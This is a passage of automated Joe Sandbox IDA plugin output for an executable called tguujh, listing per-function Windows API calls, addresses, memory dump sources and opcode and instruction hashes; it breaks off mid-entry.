                                                              • Instruction ID: 7fd9235f52dbc5f65f2a9ded7caab31ad07c7ae7e13ce07aa3c63efaae5b2d45
                                                              • Opcode Fuzzy Hash: b9e2a928352bce5da3afa2660672e81a779b082ee0e9bdee55f7ea115cdb17d8
                                                              • Instruction Fuzzy Hash: DA315A75A00609EFDB14CF6DC980B99B7B5FB04315F148629EC2597340C7B1BE98DB94
                                                              APIs
                                                                • Part of subcall function 00C55F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C56049
                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00C6FD44
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C6FD53
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00CAFDD3
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell_Timer$Kill
                                                              • String ID:
                                                              • API String ID: 3500052701-0
                                                              • Opcode ID: cc863587bffd066d17fad58df6093af7481de81d6540dbc1ff2abd6453cabb55
                                                              • Instruction ID: 71dc9004d94ff00487f9aacb8fffbc8b7a0ab9197afda961f1a36dc4a1a61dd3
                                                              • Opcode Fuzzy Hash: cc863587bffd066d17fad58df6093af7481de81d6540dbc1ff2abd6453cabb55
                                                              • Instruction Fuzzy Hash: 5A31B171904344AFEB33CF648895BEABBECAF12308F0004AEE5DA97241C7745A86CB51
                                                              APIs
                                                              • CloseHandle.KERNELBASE(00000000,00000000,?,?,00C8895C,?,00D19CE8,0000000C), ref: 00C88A94
                                                              • GetLastError.KERNEL32(?,00C8895C,?,00D19CE8,0000000C), ref: 00C88A9E
                                                              • __dosmaperr.LIBCMT ref: 00C88AC9
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                              • String ID:
                                                              • API String ID: 2583163307-0
                                                              • Opcode ID: f03e891cc801fb1f632790271c2237fb1834956143f13e071687a24fed79c1ca
                                                              • Instruction ID: b940c7a5863187fc5f41c2a1b6811e693fb8a02844933ed549c58d8d3f87820f
                                                              • Opcode Fuzzy Hash: f03e891cc801fb1f632790271c2237fb1834956143f13e071687a24fed79c1ca
                                                              • Instruction Fuzzy Hash: C8018E336052604AD62C73745885BFE27495F81B3CF69021BF838CB5D2DEA0DD89B398
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00C897CA,FF8BC369,00000000,00000002,00000000), ref: 00C89754
                                                              • GetLastError.KERNEL32(?,00C897CA,FF8BC369,00000000,00000002,00000000,?,00C85EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00C76F61), ref: 00C8975E
                                                              • __dosmaperr.LIBCMT ref: 00C89765
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer__dosmaperr
                                                              • String ID:
                                                              • API String ID: 2336955059-0
                                                              • Opcode ID: 901270df904f03511b584b65e58dad7b7bf2967683420abd595cdab44ff1dea6
                                                              • Instruction ID: 84c9cbcde1619f4dcde799d5b30f948c3e847c7ee5ab7f7aedd3e37511e8f2d5
                                                              • Opcode Fuzzy Hash: 901270df904f03511b584b65e58dad7b7bf2967683420abd595cdab44ff1dea6
                                                              • Instruction Fuzzy Hash: 4C017037620514AFCB05AFA9DC45D7F3B2AEF85334B280259F825CB190EA70DD01D790
                                                              APIs
                                                              • TranslateMessage.USER32(?), ref: 00C5F22B
                                                              • DispatchMessageW.USER32(?), ref: 00C5F239
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C5F24F
                                                              • Sleep.KERNELBASE(0000000A), ref: 00C5F261
                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00CA327C
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                              • String ID:
                                                              • API String ID: 3288985973-0
                                                              • Opcode ID: 69efc255f6f53fc8d487259ea0b2aa50038acb76d894ffbdb48e8d4c1508dd72
                                                              • Instruction ID: af21e3537f5b461d4c84a18505ef0d6f11e83c01f77331e8fa1a71cf2459f40d
                                                              • Opcode Fuzzy Hash: 69efc255f6f53fc8d487259ea0b2aa50038acb76d894ffbdb48e8d4c1508dd72
                                                              • Instruction Fuzzy Hash: 70F089705043819BF7348760DC89FEA73ACAB44305F000628F65AC70C0DB70968DCB25
                                                              APIs
                                                              • __Init_thread_footer.LIBCMT ref: 00C62FB6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Init_thread_footer
                                                              • String ID: CALL
                                                              • API String ID: 1385522511-4196123274
                                                              • Opcode ID: a2eba15aa4dd778b9af68f0e212347ee25c12f7257aa270a3f47a64b6b9aeca2
                                                              • Instruction ID: ecb523517434d811458182ed7847c5162cf38fb5f3d71985fca8124553fb07ad
                                                              • Opcode Fuzzy Hash: a2eba15aa4dd778b9af68f0e212347ee25c12f7257aa270a3f47a64b6b9aeca2
                                                              • Instruction Fuzzy Hash: FD228B70608642DFC724DF14C880B2ABBF1BF99314F24895DF49A8B3A2D772E945DB52
                                                              APIs
                                                              • GetOpenFileNameW.COMDLG32(?), ref: 00C94115
                                                                • Part of subcall function 00C5557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C55558,?,?,00C94B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C5559E
                                                                • Part of subcall function 00C539DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C539FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Name$Path$FileFullLongOpen
                                                              • String ID: X
                                                              • API String ID: 779396738-3081909835
                                                              • Opcode ID: 44f728bf54a0cfb03d3d7612bebefc90f5627164e3a68554f3fdcc8a21839eab
                                                              • Instruction ID: 8fefaef36d66b4f6c861a450a001d2eab4904b53609f1bfd429e37655e866d1a
                                                              • Opcode Fuzzy Hash: 44f728bf54a0cfb03d3d7612bebefc90f5627164e3a68554f3fdcc8a21839eab
                                                              • Instruction Fuzzy Hash: C521C371A00288AFDF11DF94D805BEE7BF8AF48311F004019E805A7381DBB45ACD9BA5
                                                              APIs
                                                              • GetComputerNameW.KERNEL32(?,?), ref: 00CAE6F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ComputerName
                                                              • String ID: X64
                                                              • API String ID: 3545744682-893830106
                                                              • Opcode ID: f4521bc3391b7520afcfe8ea6b3f1b75ea8fae300a5705c7e9f6df4ff48adc61
                                                              • Instruction ID: 4cb170ab0ea4faf53511361eaf83ffe090e8bea6eba2218d5e655626d0e198fa
                                                              • Opcode Fuzzy Hash: f4521bc3391b7520afcfe8ea6b3f1b75ea8fae300a5705c7e9f6df4ff48adc61
                                                              • Instruction Fuzzy Hash: 00D0C9B480521DEACBA0CF91DCC8EED737CBB14304F104856F002A2040DB7465489B50
                                                              APIs
                                                                • Part of subcall function 00C5557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C55558,?,?,00C94B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C5559E
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00CC9665
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CC9673
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringWrite$FullNamePath
                                                              • String ID:
                                                              • API String ID: 3876400906-0
                                                              • Opcode ID: c8654afa7db0b666121d4517f4ccaadbdcdba0cded94ee94375f125a83eb2550
                                                              • Instruction ID: 1d293cb02e7dafa2d7359dafa956d49e70e361c20e2639f3f908cd580b02ad18
                                                              • Opcode Fuzzy Hash: c8654afa7db0b666121d4517f4ccaadbdcdba0cded94ee94375f125a83eb2550
                                                              • Instruction Fuzzy Hash: 491107796006299FCB01EB64C845D6EB7B5FF48360B058458EC56AB361CB30FD49DB94
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00C53B33,?,00008000), ref: 00C56E80
                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00C53B33,?,00008000), ref: 00C959A2
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 3f85459000144d9d3863565fff01af42ed2b47cef73cf317c16918d875fd65b7
                                                              • Instruction ID: 4d80b3b02a1da19ee6a195f5deae418b1cedcfc2f11af3d2cc6aee72ca512001
                                                              • Opcode Fuzzy Hash: 3f85459000144d9d3863565fff01af42ed2b47cef73cf317c16918d875fd65b7
                                                              • Instruction Fuzzy Hash: 74018035145221BAE7710A26CC0EF9B7F98EF02771F108210FEA96E1E0C7B45999CB94
                                                              APIs
                                                              • IsThemeActive.UXTHEME ref: 00C532C4
                                                                • Part of subcall function 00C5326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C53282
                                                                • Part of subcall function 00C5326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C53299
                                                                • Part of subcall function 00C53312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00C532EF,?), ref: 00C53342
                                                                • Part of subcall function 00C53312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00C532EF,?), ref: 00C53355
                                                                • Part of subcall function 00C53312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00D22418,00D22400,?,?,?,?,?,?,00C532EF,?), ref: 00C533C1
                                                                • Part of subcall function 00C53312: SetCurrentDirectoryW.KERNELBASE(?,00000001,00D22418,?,?,?,?,?,?,?,00C532EF,?), ref: 00C53442
                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00C532FE
                                                              Similarity
                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                              • String ID:
                                                              • API String ID: 1550534281-0
                                                              • Opcode ID: 837d18a06a6258f95df0db078c00088318742da214737be419fb501381e685c5
                                                              • Instruction ID: a5de297de14187d4d1dc7ca671092c07725a6de389c1d8af19f376b9af89dc9d
                                                              • Opcode Fuzzy Hash: 837d18a06a6258f95df0db078c00088318742da214737be419fb501381e685c5
                                                              • Instruction Fuzzy Hash: 0DF0B471518784AFE310EF60EC0AB383790A714306F004409B909C92F3DBB955969B24
                                                              APIs
                                                              • timeGetTime.WINMM ref: 00C6F97A
                                                                • Part of subcall function 00C5EE0B: GetInputState.USER32 ref: 00C5EEB7
                                                              • Sleep.KERNEL32(00000000), ref: 00CAFAC2
                                                              Similarity
                                                              • API ID: InputSleepStateTimetime
                                                              • String ID:
                                                              • API String ID: 4149333218-0
                                                              • Opcode ID: 4fe34c3fab207ea138763c4581f77784138ac19ef3c64222f36c4419f2952744
                                                              • Instruction ID: 655dcbbad9e416408a65f5f91d25a7f20813474fc55bd884a327dd3116009a6b
                                                              • Opcode Fuzzy Hash: 4fe34c3fab207ea138763c4581f77784138ac19ef3c64222f36c4419f2952744
                                                              • Instruction Fuzzy Hash: E9F0EC712003019FC314EFA9D489B5AB7E8FF49321F00002AE84ACB260CB70A840CB94
                                                              APIs
                                                                • Part of subcall function 00C8506A: DeleteCriticalSection.KERNEL32(?,?,?,?,?,00D19C08,00000010,00C794DE), ref: 00C850CC
                                                                • Part of subcall function 00C8506A: _free.LIBCMT ref: 00C850DA
                                                                • Part of subcall function 00C8510A: _free.LIBCMT ref: 00C8512C
                                                              • DeleteCriticalSection.KERNEL32(-00000020), ref: 00C794FA
                                                              • _free.LIBCMT ref: 00C7950E
                                                              Similarity
                                                              • API ID: _free$CriticalDeleteSection
                                                              • String ID:
                                                              • API String ID: 1906768660-0
                                                              • Opcode ID: ffb093cd220788c91b0e5796ae4d3d7767d8a17072dbc8c6ef4f7aae3116cee0
                                                              • Instruction ID: 4ebb444fa8b8e61e7bd154f83ae56154c59ea32169271d1dde110819261c75a6
                                                              • Opcode Fuzzy Hash: ffb093cd220788c91b0e5796ae4d3d7767d8a17072dbc8c6ef4f7aae3116cee0
                                                              • Instruction Fuzzy Hash: 90E0DF3B8046108BC7317768FC4AA0933F4FB6B354B058506F419C3220CF616C03A768
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,00C5AE65,?,?,?), ref: 00C58793
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00C5AE65,?,?,?), ref: 00C587C9
                                                              Similarity
                                                              • API ID: ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 626452242-0
                                                              • Opcode ID: 880341dd8c4cc877f02b6fe6caaf8630cb4f68f33aa4a19ef0139fa035d37484
                                                              • Instruction ID: 8db8098966f185a23011fbdaade88587df2bfbe565b5ba8b498d0c0fcec4b8b0
                                                              • Opcode Fuzzy Hash: 880341dd8c4cc877f02b6fe6caaf8630cb4f68f33aa4a19ef0139fa035d37484
                                                              • Instruction Fuzzy Hash: 3301F7753001047FEB18AB799C4BF7F7AADDB88350F20403EB506DA1D0EDA0AC449238
                                                              APIs
                                                              • __Init_thread_footer.LIBCMT ref: 00C5CE8E
                                                              Similarity
                                                              • API ID: Init_thread_footer
                                                              • String ID:
                                                              • API String ID: 1385522511-0
                                                              • Opcode ID: 601c3d2907744489fab22d583e6b023e034d9560549d51a01bbb652d1393de98
                                                              • Instruction ID: d550a8f01c7e7cfadc6d9c8058f1b10fd8d937bd853f21a0db1399bc4bafeaa7
                                                              • Opcode Fuzzy Hash: 601c3d2907744489fab22d583e6b023e034d9560549d51a01bbb652d1393de98
                                                              • Instruction Fuzzy Hash: 0C32D278A003059FCB24CF58C8C5ABAB7B5EF55315F18805AEC26AB351C774EE85CB94
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 58f855d71b0b4a0cf203076532637a96a78adf69c7dc653e699fbe514739b9af
                                                              • Instruction ID: 7d18d63d846f09ff9b6a1e87e8dcc866f5c261f8f650ffb9f4774c4a59ae1afc
                                                              • Opcode Fuzzy Hash: 58f855d71b0b4a0cf203076532637a96a78adf69c7dc653e699fbe514739b9af
                                                              • Instruction Fuzzy Hash: B551B775A00108AFDB10DF68C880A697BB1EF85364F19C16CE86C9B392D771DD43CB90
                                                              APIs
                                                              • TerminateProcess.KERNELBASE ref: 00C700AF
                                                              Similarity
                                                              • API ID: ProcessTerminate
                                                              • String ID:
                                                              • API String ID: 560597551-0
                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction ID: 22b5dd04505c242d4b797a3e23288d4f5eea489054637669c51e2ea4facadd4b
                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction Fuzzy Hash: C931C270A00105DBC718CF59C484A69F7A6FB59320B74C6AAE41ECB356D732EEC1CB90
                                                              APIs
                                                                • Part of subcall function 00C5557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C55558,?,?,00C94B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C5559E
                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 00CC8EBE
                                                              Similarity
                                                              • API ID: FullNamePathPrivateProfileString
                                                              • String ID:
                                                              • API String ID: 1991638491-0
                                                              • Opcode ID: f64e2b5438fe42a523c6d473af2057cede78836af19f13fa415d9c16d018b905
                                                              • Instruction ID: 394ae944ca264300567f2da7d5e454692660c3727d3bc1b9438fc75ea6878b10
                                                              • Opcode Fuzzy Hash: f64e2b5438fe42a523c6d473af2057cede78836af19f13fa415d9c16d018b905
                                                              • Instruction Fuzzy Hash: F3214F3D600605AFCB01EB64C842CAEBBB5EF48361B048054F946AB371CB70BD89DB94
                                                              APIs
                                                                • Part of subcall function 00C56332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C5637F,?,?,00C560AA,?,00000001,?,?,00000000), ref: 00C5633E
                                                                • Part of subcall function 00C56332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C56350
                                                                • Part of subcall function 00C56332: FreeLibrary.KERNEL32(00000000,?,?,00C5637F,?,?,00C560AA,?,00000001,?,?,00000000), ref: 00C56362
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00C560AA,?,00000001,?,?,00000000), ref: 00C5639F
                                                                • Part of subcall function 00C562FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C954C3,?,?,00C560AA,?,00000001,?,?,00000000), ref: 00C56304
                                                                • Part of subcall function 00C562FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C56316
                                                                • Part of subcall function 00C562FB: FreeLibrary.KERNEL32(00000000,?,?,00C954C3,?,?,00C560AA,?,00000001,?,?,00000000), ref: 00C56329
                                                              Similarity
                                                              • API ID: Library$Load$AddressFreeProc
                                                              • String ID:
                                                              • API String ID: 2632591731-0
                                                              • Opcode ID: cd9607810ab2ea3ac12818215b8180d8e80512bff87cd2347a6c97c60b7f90bf
                                                              • Instruction ID: 3ab3fefdb28ebed646599fdb886225332bbb9ab31a575de9efefd61e66c38aa0
                                                              • Opcode Fuzzy Hash: cd9607810ab2ea3ac12818215b8180d8e80512bff87cd2347a6c97c60b7f90bf
                                                              • Instruction Fuzzy Hash: 3D113A3A700204AACF10FB30CC02BAD77A19F50752FA0842DFC43AB1D1EEB09E89A754
                                                              APIs
                                                              Similarity
                                                              • API ID: __wsopen_s
                                                              • String ID:
                                                              • API String ID: 3347428461-0
                                                              • Opcode ID: ab126dbee4aed7828cd77d06f247e1b3907a987afd115eb401800fa04db402ea
                                                              • Instruction ID: 6b8288e21c162b47f02204fc6086641aa5790bbbfc9f9a6c4150d7898d8946a3
                                                              • Opcode Fuzzy Hash: ab126dbee4aed7828cd77d06f247e1b3907a987afd115eb401800fa04db402ea
                                                              • Instruction Fuzzy Hash: 03115A7690420AAFCF15DF58E94099F7BF5EF48314F104069F808AB311DA30EA15CBA8
                                                              APIs
                                                              • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00C56B73,?,00010000,00000000,00000000,00000000,00000000), ref: 00C5B0AC
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: e9d1e99f3a0d62918c24b260540b65f2cca5d9b4e1359d96454854e711865b8c
                                                              • Instruction ID: 6a64968ea834a4aeacb9d8040eb45c4f272ff2c98fda69b0444731d623245ce6
                                                              • Opcode Fuzzy Hash: e9d1e99f3a0d62918c24b260540b65f2cca5d9b4e1359d96454854e711865b8c
                                                              • Instruction Fuzzy Hash: 64113A75200705DFD7308E15C480B67BBE9EF84365F10C42DE9AA8BA91C771AD89CB64
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C533E9,00D22418,?,?,?,?,?,?,?,00C532EF,?), ref: 00C54227
                                                                • Part of subcall function 00C584B7: _wcslen.LIBCMT ref: 00C584CA
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FullNamePath_wcslen
                                                              • String ID:
                                                              • API String ID: 4019309064-0
                                                              • Opcode ID: 6e77e52b304bfa925ece0f0a2aa1374e3df6684768d23306f62ba3eaf93ab963
                                                              • Instruction ID: a5338ef6bcfc15061e5bd57e3189f1d5f6ca74a2960c87623a85094a181a30fc
                                                              • Opcode Fuzzy Hash: 6e77e52b304bfa925ece0f0a2aa1374e3df6684768d23306f62ba3eaf93ab963
                                                              • Instruction Fuzzy Hash: F511A539500218A7CF14EBA49C05EED73B8AF1835AF004065BD55E7291DE7497CC9725
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e3bcfdf3ea30de5ad2fd104242f32a7f0da7ba7ac48dae96aa9490ba82f0e323
                                                              • Instruction ID: 645229880f02d2806f53c02fe0f3247da7e2a03e8ad7f4852b6c57d9e0e3f333
                                                              • Opcode Fuzzy Hash: e3bcfdf3ea30de5ad2fd104242f32a7f0da7ba7ac48dae96aa9490ba82f0e323
                                                              • Instruction Fuzzy Hash: 9AF028335116209BC6313A6A9C09BAE37989F46338F108755FA7D921D1EFB0D902A795
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00C76A99,?,0000015D,?,?,?,?,00C785D0,000000FF,00000000,?,?), ref: 00C83BE2
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: c70d7ba115e5f1ae24b81e8ecf40b8f44ebd81f47c17c40317a95cb5e1f31c8e
                                                              • Instruction ID: 9b921a8aad31d7d8accc69a09bf2296792d548baac3ff5a2f1b7bf2facac72ef
